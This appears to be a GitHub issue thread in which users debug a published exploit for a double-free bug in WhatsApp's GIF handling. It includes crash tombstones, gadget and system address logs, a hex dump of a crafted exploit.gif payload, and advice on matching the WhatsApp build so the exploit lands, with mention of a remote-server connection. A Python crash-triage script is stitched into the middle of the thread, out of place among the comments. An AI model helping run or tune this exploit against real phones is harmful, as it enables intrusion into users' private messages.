Whatsapp crashed #6

Closed
Ychiel opened this issue Dec 9, 2019 · 14 comments


@Ychiel

Ychiel commented Dec 9, 2019

Hi,
I have Android 9 with WhatsApp 2.19.203.
I found the gadget and the system with the Android APK that you published.
When I enter the WhatsApp gallery after sending the GIF file as a document, the app crashes.

Do you have any idea why?
Logs:

12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

@awakened1712
Owner

The APK generates GIF files that trigger writing test.txt to /sdcard.

It probably succeeded; you can check the sdcard to see if test.txt is there.

@Ychiel
Author

Ychiel commented Dec 11, 2019

There is no test.txt file.
I see just the exploit.gif file...

@awakened1712
Owner

From the log, apparently the exploit was able to hit the gadget found in libhwui.so. Check if WhatsApp has write permission to the sdcard.

@Ychiel
Author

Ychiel commented Dec 14, 2019

Yes,
WhatsApp has full permissions (Camera, Contacts, Location, Microphone, Phone, SMS and Storage).
What else?

@jpclaudino

Hi,
I have Android 9 with WhatsApp 2.19.203.
I found the gadget and the system with the Android APK that you published.
When I enter the WhatsApp gallery after sending the GIF file as a document, the app crashes.

Do you have any idea why?
Logs:

12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

Are you sure you found the system and gadget location?
By the log, the Android is 32-bit.
The double free occurs normally. But the gadget should not be found. The registers and the addresses are different.

@Ychiel
Author

Ychiel commented Dec 17, 2019

I used your APK to find the values for the System and Gadget.
Attached is the logcat from the APK:
2-17 20:58:41.032 14168 14168 D InputTransport: Input channel destroyed: fd=72
12-17 20:58:43.222 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 0
12-17 20:58:43.292 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 1
12-17 20:58:43.467 14168 14168 E libgif : gadget = 68 0E 40 F9 60 82 00 91 00 01 3F D6 size = 12 found in
12-17 20:58:43.467 14168 14168 E libgif : 731b3cb000-731bb79000 r-xp 00000000 fd:00 3812 /system/lib64/libhwui.so
12-17 20:58:43.467 14168 14168 E libgif : g1_loc = 0x731b4c3444
12-17 20:58:43.467 14168 14168 E libgif : system_loc = 0x731cab3e08
12-17 20:58:43.467 14168 14168 E libgif : == genLine_0 complete ==
12-17 20:58:43.468 14168 14168 E libgif : buffer = 0x7fe0b318b0 size = 266
12-17 20:58:43.468 14168 14168 E libgif : 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
12-17 20:58:43.468 14168 14168 E libgif : FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
12-17 20:58:43.468 14168 14168 E libgif : 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 08 7C AC E2
12-17 20:58:43.468 14168 14168 E libgif : 30 07 00 00 00 74 DE D4 19 83 06 C4 8B 39 64 C6
12-17 20:58:43.468 14168 14168 E libgif : 84 91 43 E6 05 9D 32 73 E8 B8 A0 83 87 0E 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 44 68 30 D9 30 07 00 00 00 EE FF FF 2C 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 18 00 0A 00 0F 00 01 00 00 3B
12-17 20:58:43.501 14168 14182 I ExternalStorage: Scanned /storage/emulated/0/exploit.gif -> uri = content://media/external/images/media/96

Are those the right results?

@jpclaudino

jpclaudino commented Dec 17, 2019

Try the following command:
adb shell
getprop | grep eabi

If you see something like this, you're on a 32-bit architecture.

ro.product.cpu.abi]: [armeabi-v7a]
ro.product.cpu.abi2]: [armeabi]
ro.product.cpu.abilist]: [armeabi-v7a,armeabi]
ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
ro.vendor.product.cpu.abilist]: [armeabi-v7a,armeabi]
ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]

@Ychiel
Author

Ychiel commented Dec 17, 2019

This is the result:
beyond1:/ $ getprop | grep eabi
[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
[ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]

@jpclaudino

64-bit architecture. Strange; it may be the version of WhatsApp installed.

These registers and library calls indicate 32-bit libs usage:
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
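The two checks discussed in this thread (the `getprop | grep eabi` output above, and reading the 32-bit register width and `/system/lib/` paths out of the tombstone) can be automated for crash triage. The following is an added example written for this page; it is not code from the issue or from the repository's APK. It parses a constructed tombstone excerpt in the same shape as the log posted here plus constructed `getprop` output, and reports the crashed process's bitness, the device's supported bitness, whether they disagree (a 32-bit app on a 64-bit device, as turned out to be the case here), the signal and the allocator abort message. The sample inputs, function names and the `ABI_BITS` table are assumptions made for the example.

```python
import re
from typing import Dict, Optional

# Constructed sample: a tombstone excerpt in the shape of the crash log quoted in this thread.
SAMPLE_TOMBSTONE = """\
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.756 27111 27111 F DEBUG : #02 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #03 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
"""

# Constructed sample: `adb shell getprop | grep abi` output from a 64-bit device.
SAMPLE_GETPROP = """\
[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
[ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
[ro.product.cpu.abilist64]: [arm64-v8a]
"""

ABI_BITS = {"arm": 32, "x86": 32, "arm64": 64, "x86_64": 64}   # tombstone 'ABI:' values
ABI64 = {"arm64-v8a", "x86_64"}                               # 64-bit entries in abilist

FRAME_RE = re.compile(r"#(\d+)\s+pc\s+([0-9a-f]+)\s+(\S+)(?:\s+\((.*)\))?")
REG_RE = re.compile(r"\b(?:r\d+|x\d+|ip|sp|lr|pc)\s+([0-9a-f]+)")


def strip_prefix(line: str) -> str:
    """Drop the logcat 'date time pid tid level DEBUG :' prefix when present."""
    return line.split("DEBUG :", 1)[1].strip() if "DEBUG :" in line else line.strip()


def parse_tombstone(text: str) -> Dict[str, object]:
    """Pull out the fields a first-pass crash triage needs."""
    info: Dict[str, object] = {"abi": None, "process": None, "signal": None,
                               "abort_message": None, "register_bits": None, "frames": []}
    for raw in text.splitlines():
        line = strip_prefix(raw)
        if m := re.match(r"ABI: '(\w+)'", line):
            info["abi"] = m.group(1)
        elif m := re.search(r">>> (\S+) <<<", line):
            info["process"] = m.group(1)
        elif m := re.match(r"signal (\d+) \((\w+)\)", line):
            info["signal"] = m.group(2)
        elif m := re.match(r"Abort message: '(.*)'", line):
            info["abort_message"] = m.group(1)
        elif m := FRAME_RE.match(line):
            info["frames"].append({"n": int(m.group(1)), "pc": m.group(2),
                                   "lib": m.group(3), "sym": m.group(4)})
        else:
            regs = REG_RE.findall(line)
            if regs and info["register_bits"] is None:
                # 8 hex digits per register means 32-bit, 16 means 64-bit
                info["register_bits"] = 4 * len(regs[0])
    return info


def process_bits(info: Dict[str, object]) -> Optional[int]:
    """Bitness of the crashed process: ABI line first, then register width, then lib paths."""
    if info["abi"] in ABI_BITS:
        return ABI_BITS[info["abi"]]
    if info["register_bits"]:
        return info["register_bits"]
    for f in info["frames"]:
        if "/lib64/" in f["lib"]:
            return 64
        if "/lib/" in f["lib"]:
            return 32
    return None


def device_bits(getprop_text: str) -> Optional[int]:
    """Bitness the device supports, from ro.product.cpu.abilist (64 if any 64-bit ABI is listed)."""
    m = re.search(r"\[ro\.product\.cpu\.abilist\]:\s*\[([^\]]*)\]", getprop_text)
    if not m:
        return None
    abis = {a.strip() for a in m.group(1).split(",")}
    return 64 if abis & ABI64 else 32


def triage(tombstone: str, getprop_text: str) -> Dict[str, object]:
    """Summarise the crash and flag a 32-bit process running on a 64-bit device."""
    info = parse_tombstone(tombstone)
    pbits, dbits = process_bits(info), device_bits(getprop_text)
    abort = info["abort_message"] or ""
    return {
        "process": info["process"],
        "signal": info["signal"],
        "abort_message": abort,
        "process_bits": pbits,
        "device_bits": dbits,
        "mismatch": pbits is not None and dbits is not None and pbits != dbits,
        "allocator_abort": "free" in abort,   # bionic's 'passed to free' family of aborts
        "libs": sorted({f["lib"].rsplit("/", 1)[-1] for f in info["frames"]}),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TOMBSTONE, SAMPLE_GETPROP).items():
        print(f"{key}: {value}")
```

Run it against a real tombstone and `getprop` dump by replacing the two sample strings with file contents; a `mismatch` of `True` is the situation diagnosed in this thread, and `allocator_abort` distinguishes bionic's heap-consistency aborts from other SIGABRT causes.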

@Ychiel
Author

Ychiel commented Dec 17, 2019

I think that the hardware is 64-bit but the Android OS is 32-bit.

@awakened1712
Owner

I see, you probably got the 32-bit WhatsApp running on the 64-bit Android device. Then you probably want to go to apkmirror to find the arm64 version.

I suggest this https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-19-216-release/whatsapp-messenger-2-19-216-3-android-apk-download/

@Ychiel
Author

Ychiel commented Dec 18, 2019

Thanks, now it's working...
But the connection to the remote server closes immediately.
How can I keep the connection open?

@awakened1712
Owner

awakened1712 commented Dec 18, 2019

Nice. Why do you need to keep it open? I don't mind sharing but I'm afraid script kiddies will misuse it to do hacking in real life.

@Ychiel
Author

Ychiel commented Dec 18, 2019

I want to create a demo and show access to WhatsApp data,
to explain to our employees that the information in WhatsApp can leak even though the communication between devices is encrypted.
